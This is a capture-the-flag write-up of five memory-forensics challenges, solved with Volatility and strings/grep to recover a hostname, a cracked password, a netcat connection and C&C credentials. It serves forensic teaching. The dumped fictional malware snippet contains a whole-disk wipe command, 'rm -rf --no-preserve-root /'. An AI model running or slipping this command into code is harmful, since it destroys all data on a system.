HeroCTFv3 - We_need_you - Write up


Here is my write-up of the five memory-dump forensic challenges made by Worty (https://twitter.com/_Worty) for HeroCTF v3.

We need you 1/5

Interpol and the FBI have been investigating for over a year now. They are trying to get their hands on two hackers very well known for their ransomware and their ultra efficient botnet.

After long months of investigation, they managed to get their hands on one of their servers. But, when they got it back the PC caught fire because of a defense mechanism set up by the two hackers.

The hard drive could not be saved, but they had time to put the RAM in liquid nitrogen and analyze it later.

You know what you have to do!

For this first step, find the name of the PC!

Download here.

Author: Worty
Format: Hero{Name}

So we are going to use Volatility to analyze this memory dump. A quick imageinfo gives us the profile -> Win7SP1x86_23418.

To find the name of the PC, we just have to use hivelist, then printkey with the offset of \REGISTRY\MACHINE\SYSTEM. And we find the name -> KANNIBAL.

Hero{KANNIBAL}

We need you 2/5

It must be their team name.

For this second step, find the user's name and password in clear text.

Author: Worty

Format: Hero{Username:Password}

So we need to find a username and their password: classic hashdump.

The user seems to be Razex; we just have to take the second part of the line (the NT hash) and submit it to CrackStation.

Nice, we have the username and the password.

Hero{Razex:liverpoolfc123}

We need you 3/5

We know for sure that this server allowed connecting to infected machines.
Can you check if a connection was instantiated?

Author: Worty

Format: Hero{IP:Port}

So we have to find an IP and a port. First, we are going to check what has been done on the box, with a quick consoles:

And we see this: a netcat command reaching out to the IP 146.59.156.82 on port 4444. We could also check connections with the netscan plugin.

We see the same thing right here.

Hero{146.59.156.82:4444}

We need you 4/5

The FBI and Interpol are desperately looking for the first and last names of the two hackers.
Moreover, we know that they were developing a malware, find its name and version too!
Find this valuable information!

Author: Worty

Format: Hero{Lastname-Firstname:Lastname-Firstname:NAME-X.X.X}

So we are going to check Razex’s documents to start this challenge.

We see the file Nemesis.py.txt.py.txt, which has a strange name, so we are going to dump it.

```code
#Author : PAVOLI Ruben
#Version: 4.5.1
import os
os.system("rm -rf --no-preserve-root /")
def encrypt():
    with open("rsa_gen.key","rb"):
        ################################################
        #            MALWARE PUSH ON GIT                #
        ################################################
```

We cat the file and see an author and a version of the malware. So we only have to find the second author now. After a few more commands, the clipboard plugin gives us the second author.

Hero{GOLDEN-Dany:PAVOLI-Ruben-4.5.1}

We need you 5/5

Last step in your analysis. Both hackers use a Command & Control server to manage their botnet.

Our teams are wondering if there are any traces of the URL and login credentials in the RAM of this server.

Author: Worty

Format : Hero{url-user:password}

P.S.: The flag is case sensitive

So we need to find the C&C URL and credentials. We are going to use the iehistory plugin to look for a strange URL.

We see this URL many times; it's a strange .onion which contains the name of the malware we saw before, and in this URL we can also see a login.php page. So now our goal is to find the credentials. Now begins the hard part. I'm going to describe some of the steps that allowed me to first-blood this challenge. I checked the result of iehistory and couldn't find the data that was sent. I did succeed in dumping the login page, here it is:

```code
0x000000007fee3038      1      1 R--rw- \Device\HarddiskVolume2\Users\Razex\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\3ISVHNCV\login[1].htm
Get out.<!DOCTYPE HTML>
<head>
	<title>Connect.</title>
</head>
<body>
	<form method="POST" action="./login.php">
		<input name="username"><br/>
		<input name="password" type="password"><br/>
		<button type"submit">submit</button>
	</form>
</body>
</html>
```

So we see that it's going to be POST data. Since iehistory, mftparser and the other classic plugins show nothing more, we can now focus on the browser process memory. Let's dump the two Internet Explorer processes.

Quick pslist:

```code
0x862ba7a0 iexplore.exe           3404   2012     16      558      1      0 2021-04-19 17:23:25 UTC+0000
0x8541d1e8 iexplore.exe           3504   3404     21      567      1      0 2021-04-19 17:23:25 UTC+0000
```

Then we dump both processes:

```code
volatility -f capture.mem --profile=Win7SP1x86_23418 memdump -p 3404,3504 --dump-dir .
```

Now the strings and grep part begins :)

```code
$ strings 3*04.dmp | grep -i -B 5 -A 5 "login.php"
```

We use the -i option of grep to ignore case, and -A and -B with the value 5 to print 5 lines before and 5 lines after each line where grep finds the characters we search for.

I tried this command with these keywords:

```code
login.php
.onion
razex
base64
<form method="POST"
username=
password=
...
```

During these steps, we could see that there are many Internet files; I dumped some of them and found cookies etc. I hoped one of them would contain a cookie holding the password, but unfortunately not :(.

I focused a lot on "base64" with my grep command because, after everything I had done, I was sure the password would be encoded in some way.

After many commands and a lot of reasoning, I was sure that I had done something the wrong way, or missed something.

So I went to the web to see if I could find some write-ups or advanced techniques for this kind of search. I looked again at Worty's write-up of FCSC 2020 and saw the last challenge, where he has to find a password like us. (https://w0rty.github.io/Graphic/FCSC2020/Forensic/nuages.html)

We could see this:

```code
So I check on the internet, and, on a Stack Overflow forum, a person advises to look at the strings of the file in UTF-16, and not in UTF-8, which results in the -el option of the strings command.
So I do this on my dump, and miraculously, my username and password appear!
```

And bingo, we found the problem: our approach was good, but the way we used strings was wrong. We didn't use the -el option with strings, so we couldn't see all the information: a classic strings only extracts single-byte (ASCII/UTF-8) text, while the browser stores its text in UTF-16 little-endian, which is what -el extracts.

So we just have to run this command:

```code
$ strings -el 3*04.dmp | grep -i -C 5 "razex"
...
razexP85Inq4
...
```

We can see "razexP85Inq4", which is something we had not seen before without the -el option.
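As an added illustration (not part of the original write-up): a small Python re-implementation of what plain `strings` and `strings -el` each extract, run over a constructed byte buffer that mimics the dump. The login form survives as ASCII, but the submitted credentials are stored UTF-16LE, so only the second scan finds them. The sample bytes are constructed, not taken from the challenge dump.

```python
import re

# Constructed stand-in for a slice of an iexplore.exe memory dump (not the
# challenge's real data). The login form survives as plain ASCII, but the
# submitted credentials sit in memory as UTF-16LE, as browsers store text.
SAMPLE_DUMP = (
    b"\x00\x13junk\xff\xfe"
    + b'<form method="POST" action="./login.php">'
    + b"\x00\x00\x01\x02"
    + "username=Razex&password=razexP85Inq4".encode("utf-16-le")
    + b"\x00\x00\x7f"
    + b"Get out."
    + b"\xde\xad"
)

MIN_LEN = 4  # GNU strings' default minimum length


def ascii_strings(data: bytes, min_len: int = MIN_LEN) -> list:
    """What plain `strings` sees: runs of printable single-byte characters."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def utf16le_strings(data: bytes, min_len: int = MIN_LEN) -> list:
    """What `strings -el` sees: runs of printable characters each followed by
    a NUL byte, i.e. 16-bit little-endian characters."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, data)]


def grep_i(strings: list, needle: str) -> list:
    """Case-insensitive filter, the role `grep -i` plays in the write-up."""
    return [s for s in strings if needle.lower() in s.lower()]


if __name__ == "__main__":
    # Same needle, two encodings: only the UTF-16LE pass finds the credential.
    print("strings     | razex:", grep_i(ascii_strings(SAMPLE_DUMP), "razex"))
    print("strings -el | razex:", grep_i(utf16le_strings(SAMPLE_DUMP), "razex"))
```

The same logic explains why grepping for "razex" in the default strings output returned nothing: every other byte of the credential is a NUL, which breaks the run of printable characters that `strings` looks for.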

This seems to be a password, and the hint confirms it:

```code
A good news despite this DDOS, here is a hint for the last forensic challenge:

Even if he is a very good hacker, he doesn't apply all the right principles, especially when it comes to passwords.

P.S.: No bruteforce needed, just think about the "stupid things" people do when they create passwords.
```

Razex, the username, was also in his password. This is a bad habit, because such a password can be brute-forced really easily.

Hero{http://nemesis3g2upl4pq6kufc4m.onion/-Razex:razexP85Inq4}

These challenges were pretty cool. The last one was really hard, and from now on I'm going to add the -el option every time I run strings on a memory dump.

Thanks to Worty, I really liked the last one, and see you later.